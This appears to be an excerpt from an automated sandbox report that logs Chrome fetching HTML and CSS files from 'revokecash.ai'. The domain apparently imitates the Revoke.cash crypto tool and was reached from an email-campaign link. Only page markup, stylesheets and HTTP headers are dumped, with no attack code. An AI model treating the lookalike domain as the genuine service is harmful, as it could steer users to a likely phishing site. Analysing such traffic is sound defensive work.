                                                                          2023-12-10 16:44:15 UTC1369INData Raw: 61 3e 0a 09 09 09 09 09 09 09 09 09 3c 61 20 69 64 3d 22 68 65 61 64 6c 65 73 73 75 69 2d 6d 65 6e 75 2d 69 74 65 6d 2d 3a 52 75 67 6c 71 6d 3a 22 20 72 6f 6c 65 3d 22 6d 65 6e 75 69 74 65 6d 22 20 74 61 62 69 6e 64 65 78 3d 22 2d 31 22 20 64 61 74 61 2d 68 65 61 64 6c 65 73 73 75 69 2d 73 74 61 74 65 3d 22 22 20 63 6c 61 73 73 3d 22 66 6f 63 75 73 2d 76 69 73 69 62 6c 65 3a 6f 75 74 6c 69 6e 65 2d 6e 6f 6e 65 20 66 6f 63 75 73 2d 76 69 73 69 62 6c 65 3a 72 69 6e 67 2d 31 20 66 6f 63 75 73 2d 76 69 73 69 62 6c 65 3a 72 69 6e 67 2d 62 6c 61 63 6b 20 64 61 72 6b 3a 66 6f 63 75 73 2d 76 69 73 69 62 6c 65 3a 72 69 6e 67 2d 77 68 69 74 65 20 66 6c 65 78 20 69 74 65 6d 73 2d 63 65 6e 74 65 72 20 62 6f 72 64 65 72 20 62 6f 72 64 65 72 2d 62 6c 61 63 6b 20 64 61
                                                                          Data Ascii: a><a id="headlessui-menu-item-:Ruglqm:" role="menuitem" tabindex="-1" data-headlessui-state="" class="focus-visible:outline-none focus-visible:ring-1 focus-visible:ring-black dark:focus-visible:ring-white flex items-center border border-black da
                                                                          2023-12-10 16:44:15 UTC1369INData Raw: 65 78 74 2d 63 75 72 72 65 6e 74 20 76 69 73 69 74 65 64 3a 74 65 78 74 2d 63 75 72 72 65 6e 74 20 6e 6f 2d 75 6e 64 65 72 6c 69 6e 65 20 68 6f 76 65 72 3a 6e 6f 2d 75 6e 64 65 72 6c 69 6e 65 20 66 6c 65 78 22 20 68 72 65 66 3d 22 2f 22 3e 0a 09 09 09 09 09 09 09 09 3c 69 6d 67 20 61 6c 74 3d 22 52 65 76 6f 6b 65 2e 63 61 73 68 20 6c 6f 67 6f 22 20 66 65 74 63 68 70 72 69 6f 72 69 74 79 3d 22 68 69 67 68 22 20 77 69 64 74 68 3d 22 32 34 30 22 20 68 65 69 67 68 74 3d 22 34 38 22 20 64 65 63 6f 64 69 6e 67 3d 22 61 73 79 6e 63 22 20 64 61 74 61 2d 6e 69 6d 67 3d 22 31 22 20 63 6c 61 73 73 3d 22 66 69 6c 74 65 72 20 64 61 72 6b 3a 69 6e 76 65 72 74 20 73 68 72 69 6e 6b 2d 30 22 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 74 72 61 6e 73 70 61 72 65 6e 74 22 20
                                                                          Data Ascii: ext-current visited:text-current no-underline hover:no-underline flex" href="/"><img alt="Revoke.cash logo" fetchpriority="high" width="240" height="48" decoding="async" data-nimg="1" class="filter dark:invert shrink-0" style="color:transparent"
                                                                          2023-12-10 16:44:15 UTC1369INData Raw: 73 74 72 6f 6b 65 2d 6c 69 6e 65 63 61 70 3d 22 72 6f 75 6e 64 22 20 73 74 72 6f 6b 65 2d 6c 69 6e 65 6a 6f 69 6e 3d 22 72 6f 75 6e 64 22 20 64 3d 22 4d 33 2e 37 35 20 36 2e 37 35 68 31 36 2e 35 4d 33 2e 37 35 20 31 32 68 31 36 2e 35 6d 2d 31 36 2e 35 20 35 2e 32 35 68 31 36 2e 35 22 3e 3c 2f 70 61 74 68 3e 0a 09 09 09 09 09 09 09 09 09 3c 2f 73 76 67 3e 0a 09 09 09 09 09 09 09 09 3c 2f 62 75 74 74 6f 6e 3e 0a 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 66 6c 65 78 20 6a 75 73 74 69 66 79 2d 63 65 6e 74 65 72 22 3e 0a 09 09 09 09 09 09 3c 66 6f 72 6d 20 63 6c 61 73 73 3d 22 68 2d 39 20 66 6c 65 78 20 67 61 70 2d 32 20 69 74 65 6d 73
                                                                          Data Ascii: stroke-linecap="round" stroke-linejoin="round" d="M3.75 6.75h16.5M3.75 12h16.5m-16.5 5.25h16.5"></path></svg></button></div></div></div><div class="flex justify-center"><form class="h-9 flex gap-2 items


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          4192.168.2.549714104.21.1.2284435756C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2023-12-10 16:44:15 UTC801OUTGET /_css/10ce1614d91ae5c9.css HTTP/1.1
                                                                          Host: revokecash.ai
                                                                          Connection: keep-alive
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          sec-ch-ua-mobile: ?0
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          sec-ch-ua-platform: "Windows"
                                                                          Accept: text/css,*/*;q=0.1
                                                                          Sec-Fetch-Site: same-origin
                                                                          Sec-Fetch-Mode: no-cors
                                                                          Sec-Fetch-Dest: style
                                                                          Referer: https://revokecash.ai/?utm_source=MMLEFINAL2&utm_medium=email&utm_campaign=Email%20Campaign%20-%20Dec%2010%202023%201%3A19%20PM%20%2801HHA7CG6R5E2XYD3KZ6JAVN8S%29&nb_klid=01HHA5YH0BK9WW3R5A8EZREB7H&_kx=fw2wQu0PT9c7aWP5IseYWVApjC3AozR_83oxjnwCi-bRLwV3NMDiPj-cT-Od8Ka9.HaDCVL
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          2023-12-10 16:44:16 UTC721INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 31 30 20 44 65 63 20 32 30 32 33 20 31 36 3a 34 34 3a 31 36 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 63 73 73 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 36 33 36 37 38 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 58 2d 50 6f 77 65 72 65 64 2d 42 79 3a 20 45 78 70 72 65 73 73 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 70 75 62 6c 69 63 2c 20 6d 61 78 2d 61 67 65 3d 31 34 34 30 30 0d 0a 4c 61 73 74 2d 4d 6f 64 69 66 69 65 64 3a 20 53 75 6e 2c 20 31 30 20 44 65 63 20 32 30 32 33 20 31 30 3a 30 37 3a 33 35 20 47 4d 54 0d 0a 45 54 61 67 3a 20 57 2f 22 66 38 62 65
                                                                          Data Ascii: HTTP/1.1 200 OKDate: Sun, 10 Dec 2023 16:44:16 GMTContent-Type: text/css; charset=UTF-8Content-Length: 63678Connection: closeX-Powered-By: ExpressCache-Control: public, max-age=14400Last-Modified: Sun, 10 Dec 2023 10:07:35 GMTETag: W/"f8be
                                                                          2023-12-10 16:44:16 UTC648INData Raw: 40 69 6d 70 6f 72 74 20 75 72 6c 28 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 32 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 2b 43 6f 6e 64 65 6e 73 65 64 3a 69 74 61 6c 2c 77 67 68 74 40 30 2c 33 30 30 3b 30 2c 34 30 30 3b 30 2c 37 30 30 3b 31 2c 33 30 30 3b 31 2c 34 30 30 3b 31 2c 37 30 30 26 64 69 73 70 6c 61 79 3d 73 77 61 70 22 29 3b 0a 0a 2f 2a 0a 21 20 74 61 69 6c 77 69 6e 64 63 73 73 20 76 33 2e 33 2e 36 20 7c 20 4d 49 54 20 4c 69 63 65 6e 73 65 20 7c 20 68 74 74 70 73 3a 2f 2f 74 61 69 6c 77 69 6e 64 63 73 73 2e 63 6f 6d 0a 2a 2f 2a 2c 3a 61 66 74 65 72 2c 3a 62 65 66 6f 72 65 7b 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 3b 62 6f 72 64 65 72 3a 30 20 73 6f 6c 69 64 20 23
                                                                          Data Ascii: @import url("https://fonts.googleapis.com/css2?family=Roboto+Condensed:ital,wght@0,300;0,400;0,700;1,300;1,400;1,700&display=swap");/*! tailwindcss v3.3.6 | MIT License | https://tailwindcss.com*/*,:after,:before{box-sizing:border-box;border:0 solid #
                                                                          2023-12-10 16:44:16 UTC1369INData Raw: 6f 72 64 65 72 2d 74 6f 70 2d 77 69 64 74 68 3a 31 70 78 7d 61 62 62 72 3a 77 68 65 72 65 28 5b 74 69 74 6c 65 5d 29 7b 2d 77 65 62 6b 69 74 2d 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 75 6e 64 65 72 6c 69 6e 65 20 64 6f 74 74 65 64 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 75 6e 64 65 72 6c 69 6e 65 20 64 6f 74 74 65 64 7d 68 31 2c 68 32 2c 68 33 2c 68 34 2c 68 35 2c 68 36 7b 66 6f 6e 74 2d 73 69 7a 65 3a 69 6e 68 65 72 69 74 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 69 6e 68 65 72 69 74 7d 61 7b 63 6f 6c 6f 72 3a 69 6e 68 65 72 69 74 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 69 6e 68 65 72 69 74 7d 62 2c 73 74 72 6f 6e 67 7b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 65 72 7d 63 6f 64 65 2c 6b 62 64 2c 70 72 65 2c 73 61 6d 70
                                                                          Data Ascii: order-top-width:1px}abbr:where([title]){-webkit-text-decoration:underline dotted;text-decoration:underline dotted}h1,h2,h3,h4,h5,h6{font-size:inherit;font-weight:inherit}a{color:inherit;text-decoration:inherit}b,strong{font-weight:bolder}code,kbd,pre,samp
                                                                          2023-12-10 16:44:16 UTC1369INData Raw: 6b 71 75 6f 74 65 2c 64 64 2c 64 6c 2c 66 69 67 75 72 65 2c 68 31 2c 68 32 2c 68 33 2c 68 34 2c 68 35 2c 68 36 2c 68 72 2c 70 2c 70 72 65 7b 6d 61 72 67 69 6e 3a 30 7d 66 69 65 6c 64 73 65 74 7b 6d 61 72 67 69 6e 3a 30 7d 66 69 65 6c 64 73 65 74 2c 6c 65 67 65 6e 64 7b 70 61 64 64 69 6e 67 3a 30 7d 6d 65 6e 75 2c 6f 6c 2c 75 6c 7b 6c 69 73 74 2d 73 74 79 6c 65 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 64 69 61 6c 6f 67 7b 70 61 64 64 69 6e 67 3a 30 7d 74 65 78 74 61 72 65 61 7b 72 65 73 69 7a 65 3a 76 65 72 74 69 63 61 6c 7d 69 6e 70 75 74 3a 3a 2d 6d 6f 7a 2d 70 6c 61 63 65 68 6f 6c 64 65 72 2c 74 65 78 74 61 72 65 61 3a 3a 2d 6d 6f 7a 2d 70 6c 61 63 65 68 6f 6c 64 65 72 7b 6f 70 61 63 69 74 79 3a 31 3b 63 6f 6c 6f 72 3a
                                                                          Data Ascii: kquote,dd,dl,figure,h1,h2,h3,h4,h5,h6,hr,p,pre{margin:0}fieldset{margin:0}fieldset,legend{padding:0}menu,ol,ul{list-style:none;margin:0;padding:0}dialog{padding:0}textarea{resize:vertical}input::-moz-placeholder,textarea::-moz-placeholder{opacity:1;color:
                                                                          2023-12-10 16:44:16 UTC1369INData Raw: 2d 62 61 63 6b 64 72 6f 70 2d 62 72 69 67 68 74 6e 65 73 73 3a 20 3b 2d 2d 74 77 2d 62 61 63 6b 64 72 6f 70 2d 63 6f 6e 74 72 61 73 74 3a 20 3b 2d 2d 74 77 2d 62 61 63 6b 64 72 6f 70 2d 67 72 61 79 73 63 61 6c 65 3a 20 3b 2d 2d 74 77 2d 62 61 63 6b 64 72 6f 70 2d 68 75 65 2d 72 6f 74 61 74 65 3a 20 3b 2d 2d 74 77 2d 62 61 63 6b 64 72 6f 70 2d 69 6e 76 65 72 74 3a 20 3b 2d 2d 74 77 2d 62 61 63 6b 64 72 6f 70 2d 6f 70 61 63 69 74 79 3a 20 3b 2d 2d 74 77 2d 62 61 63 6b 64 72 6f 70 2d 73 61 74 75 72 61 74 65 3a 20 3b 2d 2d 74 77 2d 62 61 63 6b 64 72 6f 70 2d 73 65 70 69 61 3a 20 7d 3a 3a 62 61 63 6b 64 72 6f 70 7b 2d 2d 74 77 2d 62 6f 72 64 65 72 2d 73 70 61 63 69 6e 67 2d 78 3a 30 3b 2d 2d 74 77 2d 62 6f 72 64 65 72 2d 73 70 61 63 69 6e 67 2d 79 3a 30 3b 2d
                                                                          Data Ascii: -backdrop-brightness: ;--tw-backdrop-contrast: ;--tw-backdrop-grayscale: ;--tw-backdrop-hue-rotate: ;--tw-backdrop-invert: ;--tw-backdrop-opacity: ;--tw-backdrop-saturate: ;--tw-backdrop-sepia: }::backdrop{--tw-border-spacing-x:0;--tw-border-spacing-y:0;-
                                                                          2023-12-10 16:44:16 UTC1369INData Raw: 30 32 34 70 78 29 7b 2e 63 6f 6e 74 61 69 6e 65 72 7b 6d 61 78 2d 77 69 64 74 68 3a 31 30 32 34 70 78 7d 7d 40 6d 65 64 69 61 20 28 6d 69 6e 2d 77 69 64 74 68 3a 31 32 38 30 70 78 29 7b 2e 63 6f 6e 74 61 69 6e 65 72 7b 6d 61 78 2d 77 69 64 74 68 3a 31 32 38 30 70 78 7d 7d 40 6d 65 64 69 61 20 28 6d 69 6e 2d 77 69 64 74 68 3a 31 35 33 36 70 78 29 7b 2e 63 6f 6e 74 61 69 6e 65 72 7b 6d 61 78 2d 77 69 64 74 68 3a 31 35 33 36 70 78 7d 7d 2e 70 72 6f 73 65 7b 63 6f 6c 6f 72 3a 76 61 72 28 2d 2d 74 77 2d 70 72 6f 73 65 2d 62 6f 64 79 29 3b 6d 61 78 2d 77 69 64 74 68 3a 36 35 63 68 7d 2e 70 72 6f 73 65 20 3a 77 68 65 72 65 28 70 29 3a 6e 6f 74 28 3a 77 68 65 72 65 28 5b 63 6c 61 73 73 7e 3d 6e 6f 74 2d 70 72 6f 73 65 5d 2c 5b 63 6c 61 73 73 7e 3d 6e 6f 74 2d 70
                                                                          Data Ascii: 024px){.container{max-width:1024px}}@media (min-width:1280px){.container{max-width:1280px}}@media (min-width:1536px){.container{max-width:1536px}}.prose{color:var(--tw-prose-body);max-width:65ch}.prose :where(p):not(:where([class~=not-prose],[class~=not-p
                                                                          2023-12-10 16:44:16 UTC1369INData Raw: 29 7b 6c 69 73 74 2d 73 74 79 6c 65 2d 74 79 70 65 3a 6c 6f 77 65 72 2d 61 6c 70 68 61 7d 2e 70 72 6f 73 65 20 3a 77 68 65 72 65 28 6f 6c 5b 74 79 70 65 3d 41 20 73 5d 29 3a 6e 6f 74 28 3a 77 68 65 72 65 28 5b 63 6c 61 73 73 7e 3d 6e 6f 74 2d 70 72 6f 73 65 5d 2c 5b 63 6c 61 73 73 7e 3d 6e 6f 74 2d 70 72 6f 73 65 5d 20 2a 29 29 7b 6c 69 73 74 2d 73 74 79 6c 65 2d 74 79 70 65 3a 75 70 70 65 72 2d 61 6c 70 68 61 7d 2e 70 72 6f 73 65 20 3a 77 68 65 72 65 28 6f 6c 5b 74 79 70 65 3d 61 20 73 5d 29 3a 6e 6f 74 28 3a 77 68 65 72 65 28 5b 63 6c 61 73 73 7e 3d 6e 6f 74 2d 70 72 6f 73 65 5d 2c 5b 63 6c 61 73 73 7e 3d 6e 6f 74 2d 70 72 6f 73 65 5d 20 2a 29 29 7b 6c 69 73 74 2d 73 74 79 6c 65 2d 74 79 70 65 3a 6c 6f 77 65 72 2d 61 6c 70 68 61 7d 2e 70 72 6f 73 65 20
                                                                          Data Ascii: ){list-style-type:lower-alpha}.prose :where(ol[type=A s]):not(:where([class~=not-prose],[class~=not-prose] *)){list-style-type:upper-alpha}.prose :where(ol[type=a s]):not(:where([class~=not-prose],[class~=not-prose] *)){list-style-type:lower-alpha}.prose
                                                                          2023-12-10 16:44:16 UTC1369INData Raw: 3d 6e 6f 74 2d 70 72 6f 73 65 5d 20 2a 29 29 7b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 76 61 72 28 2d 2d 74 77 2d 70 72 6f 73 65 2d 68 72 29 3b 62 6f 72 64 65 72 2d 74 6f 70 2d 77 69 64 74 68 3a 31 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 33 65 6d 3b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 33 65 6d 7d 2e 70 72 6f 73 65 20 3a 77 68 65 72 65 28 62 6c 6f 63 6b 71 75 6f 74 65 29 3a 6e 6f 74 28 3a 77 68 65 72 65 28 5b 63 6c 61 73 73 7e 3d 6e 6f 74 2d 70 72 6f 73 65 5d 2c 5b 63 6c 61 73 73 7e 3d 6e 6f 74 2d 70 72 6f 73 65 5d 20 2a 29 29 7b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 35 30 30 3b 66 6f 6e 74 2d 73 74 79 6c 65 3a 69 74 61 6c 69 63 3b 63 6f 6c 6f 72 3a 76 61 72 28 2d 2d 74 77 2d 70 72 6f 73 65 2d 71 75 6f 74 65 73 29 3b 62 6f 72 64 65 72 2d 6c 65 66 74
                                                                          Data Ascii: =not-prose] *)){border-color:var(--tw-prose-hr);border-top-width:1px;margin-top:3em;margin-bottom:3em}.prose :where(blockquote):not(:where([class~=not-prose],[class~=not-prose] *)){font-weight:500;font-style:italic;color:var(--tw-prose-quotes);border-left
                                                                          2023-12-10 16:44:16 UTC1369INData Raw: 74 2d 73 69 7a 65 3a 31 2e 32 35 65 6d 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 31 2e 36 65 6d 3b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 2e 36 65 6d 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 36 7d 2e 70 72 6f 73 65 20 3a 77 68 65 72 65 28 68 33 20 73 74 72 6f 6e 67 29 3a 6e 6f 74 28 3a 77 68 65 72 65 28 5b 63 6c 61 73 73 7e 3d 6e 6f 74 2d 70 72 6f 73 65 5d 2c 5b 63 6c 61 73 73 7e 3d 6e 6f 74 2d 70 72 6f 73 65 5d 20 2a 29 29 7b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 37 30 30 3b 63 6f 6c 6f 72 3a 69 6e 68 65 72 69 74 7d 2e 70 72 6f 73 65 20 3a 77 68 65 72 65 28 68 34 29 3a 6e 6f 74 28 3a 77 68 65 72 65 28 5b 63 6c 61 73 73 7e 3d 6e 6f 74 2d 70 72 6f 73 65 5d 2c 5b 63 6c 61 73 73 7e 3d 6e 6f 74 2d 70 72 6f 73 65 5d 20 2a 29 29 7b 63 6f 6c 6f 72 3a 76 61 72 28
                                                                          Data Ascii: t-size:1.25em;margin-top:1.6em;margin-bottom:.6em;line-height:1.6}.prose :where(h3 strong):not(:where([class~=not-prose],[class~=not-prose] *)){font-weight:700;color:inherit}.prose :where(h4):not(:where([class~=not-prose],[class~=not-prose] *)){color:var(
                                                                          2023-12-10 16:44:16 UTC1369INData Raw: 29 7b 63 6f 6c 6f 72 3a 69 6e 68 65 72 69 74 7d 2e 70 72 6f 73 65 20 3a 77 68 65 72 65 28 68 31 20 63 6f 64 65 29 3a 6e 6f 74 28 3a 77 68 65 72 65 28 5b 63 6c 61 73 73 7e 3d 6e 6f 74 2d 70 72 6f 73 65 5d 2c 5b 63 6c 61 73 73 7e 3d 6e 6f 74 2d 70 72 6f 73 65 5d 20 2a 29 29 7b 63 6f 6c 6f 72 3a 69 6e 68 65 72 69 74 7d 2e 70 72 6f 73 65 20 3a 77 68 65 72 65 28 68 32 20 63 6f 64 65 29 3a 6e 6f 74 28 3a 77 68 65 72 65 28 5b 63 6c 61 73 73 7e 3d 6e 6f 74 2d 70 72 6f 73 65 5d 2c 5b 63 6c 61 73 73 7e 3d 6e 6f 74 2d 70 72 6f 73 65 5d 20 2a 29 29 7b 63 6f 6c 6f 72 3a 69 6e 68 65 72 69 74 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 38 37 35 65 6d 7d 2e 70 72 6f 73 65 20 3a 77 68 65 72 65 28 68 33 20 63 6f 64 65 29 3a 6e 6f 74 28 3a 77 68 65 72 65 28 5b 63 6c 61 73 73 7e 3d
                                                                          Data Ascii: ){color:inherit}.prose :where(h1 code):not(:where([class~=not-prose],[class~=not-prose] *)){color:inherit}.prose :where(h2 code):not(:where([class~=not-prose],[class~=not-prose] *)){color:inherit;font-size:.875em}.prose :where(h3 code):not(:where([class~=


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          5192.168.2.549716104.21.1.2284435756C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2023-12-10 16:44:15 UTC801OUTGET /_css/56d1f5034e1e3936.css HTTP/1.1
                                                                          Host: revokecash.ai
                                                                          Connection: keep-alive
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          sec-ch-ua-mobile: ?0
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          sec-ch-ua-platform: "Windows"
                                                                          Accept: text/css,*/*;q=0.1
                                                                          Sec-Fetch-Site: same-origin
                                                                          Sec-Fetch-Mode: no-cors
                                                                          Sec-Fetch-Dest: style
                                                                          Referer: https://revokecash.ai/?utm_source=MMLEFINAL2&utm_medium=email&utm_campaign=Email%20Campaign%20-%20Dec%2010%202023%201%3A19%20PM%20%2801HHA7CG6R5E2XYD3KZ6JAVN8S%29&nb_klid=01HHA5YH0BK9WW3R5A8EZREB7H&_kx=fw2wQu0PT9c7aWP5IseYWVApjC3AozR_83oxjnwCi-bRLwV3NMDiPj-cT-Od8Ka9.HaDCVL
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          2023-12-10 16:44:16 UTC717INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 31 30 20 44 65 63 20 32 30 32 33 20 31 36 3a 34 34 3a 31 36 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 63 73 73 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 31 34 35 37 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 58 2d 50 6f 77 65 72 65 64 2d 42 79 3a 20 45 78 70 72 65 73 73 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 70 75 62 6c 69 63 2c 20 6d 61 78 2d 61 67 65 3d 31 34 34 30 30 0d 0a 4c 61 73 74 2d 4d 6f 64 69 66 69 65 64 3a 20 53 75 6e 2c 20 31 30 20 44 65 63 20 32 30 32 33 20 31 30 3a 30 37 3a 33 36 20 47 4d 54 0d 0a 45 54 61 67 3a 20 57 2f 22 35 62 31 2d 31
                                                                          Data Ascii: HTTP/1.1 200 OKDate: Sun, 10 Dec 2023 16:44:16 GMTContent-Type: text/css; charset=UTF-8Content-Length: 1457Connection: closeX-Powered-By: ExpressCache-Control: public, max-age=14400Last-Modified: Sun, 10 Dec 2023 10:07:36 GMTETag: W/"5b1-1
                                                                          2023-12-10 16:44:16 UTC652INData Raw: 2e 74 69 70 70 79 2d 62 6f 78 5b 64 61 74 61 2d 61 6e 69 6d 61 74 69 6f 6e 3d 66 61 64 65 5d 5b 64 61 74 61 2d 73 74 61 74 65 3d 68 69 64 64 65 6e 5d 7b 6f 70 61 63 69 74 79 3a 30 7d 5b 64 61 74 61 2d 74 69 70 70 79 2d 72 6f 6f 74 5d 7b 6d 61 78 2d 77 69 64 74 68 3a 63 61 6c 63 28 31 30 30 76 77 20 2d 20 31 30 70 78 29 7d 2e 74 69 70 70 79 2d 62 6f 78 7b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 33 33 33 3b 63 6f 6c 6f 72 3a 23 66 66 66 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 34 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 34 3b 77 68 69 74 65 2d 73 70 61 63 65 3a 6e 6f 72 6d 61 6c 3b 6f 75 74 6c 69 6e 65 3a 30 3b 74 72 61 6e 73 69 74
                                                                          Data Ascii: .tippy-box[data-animation=fade][data-state=hidden]{opacity:0}[data-tippy-root]{max-width:calc(100vw - 10px)}.tippy-box{position:relative;background-color:#333;color:#fff;border-radius:4px;font-size:14px;line-height:1.4;white-space:normal;outline:0;transit
                                                                          2023-12-10 16:44:16 UTC805INData Raw: 2d 62 6f 74 74 6f 6d 2d 63 6f 6c 6f 72 3a 69 6e 69 74 69 61 6c 3b 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 63 65 6e 74 65 72 20 62 6f 74 74 6f 6d 7d 2e 74 69 70 70 79 2d 62 6f 78 5b 64 61 74 61 2d 70 6c 61 63 65 6d 65 6e 74 5e 3d 6c 65 66 74 5d 3e 2e 74 69 70 70 79 2d 61 72 72 6f 77 7b 72 69 67 68 74 3a 30 7d 2e 74 69 70 70 79 2d 62 6f 78 5b 64 61 74 61 2d 70 6c 61 63 65 6d 65 6e 74 5e 3d 6c 65 66 74 5d 3e 2e 74 69 70 70 79 2d 61 72 72 6f 77 3a 62 65 66 6f 72 65 7b 62 6f 72 64 65 72 2d 77 69 64 74 68 3a 38 70 78 20 30 20 38 70 78 20 38 70 78 3b 62 6f 72 64 65 72 2d 6c 65 66 74 2d 63 6f 6c 6f 72 3a 69 6e 69 74 69 61 6c 3b 72 69 67 68 74 3a 2d 37 70 78 3b 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 63 65 6e 74 65 72 20 6c 65 66 74 7d 2e 74
                                                                          Data Ascii: -bottom-color:initial;transform-origin:center bottom}.tippy-box[data-placement^=left]>.tippy-arrow{right:0}.tippy-box[data-placement^=left]>.tippy-arrow:before{border-width:8px 0 8px 8px;border-left-color:initial;right:-7px;transform-origin:center left}.t


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          6192.168.2.549715104.21.1.2284435756C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2023-12-10 16:44:15 UTC791OUTGET /_css/styles.css HTTP/1.1
                                                                          Host: revokecash.ai
                                                                          Connection: keep-alive
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          sec-ch-ua-mobile: ?0
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          sec-ch-ua-platform: "Windows"
                                                                          Accept: text/css,*/*;q=0.1
                                                                          Sec-Fetch-Site: same-origin
                                                                          Sec-Fetch-Mode: no-cors
                                                                          Sec-Fetch-Dest: style
                                                                          Referer: https://revokecash.ai/?utm_source=MMLEFINAL2&utm_medium=email&utm_campaign=Email%20Campaign%20-%20Dec%2010%202023%201%3A19%20PM%20%2801HHA7CG6R5E2XYD3KZ6JAVN8S%29&nb_klid=01HHA5YH0BK9WW3R5A8EZREB7H&_kx=fw2wQu0PT9c7aWP5IseYWVApjC3AozR_83oxjnwCi-bRLwV3NMDiPj-cT-Od8Ka9.HaDCVL
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          2023-12-10 16:44:16 UTC721INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 31 30 20 44 65 63 20 32 30 32 33 20 31 36 3a 34 34 3a 31 36 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 63 73 73 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 31 39 34 39 33 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 58 2d 50 6f 77 65 72 65 64 2d 42 79 3a 20 45 78 70 72 65 73 73 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 70 75 62 6c 69 63 2c 20 6d 61 78 2d 61 67 65 3d 31 34 34 30 30 0d 0a 4c 61 73 74 2d 4d 6f 64 69 66 69 65 64 3a 20 53 75 6e 2c 20 31 30 20 44 65 63 20 32 30 32 33 20 31 30 3a 30 37 3a 33 36 20 47 4d 54 0d 0a 45 54 61 67 3a 20 57 2f 22 34 63 32 35
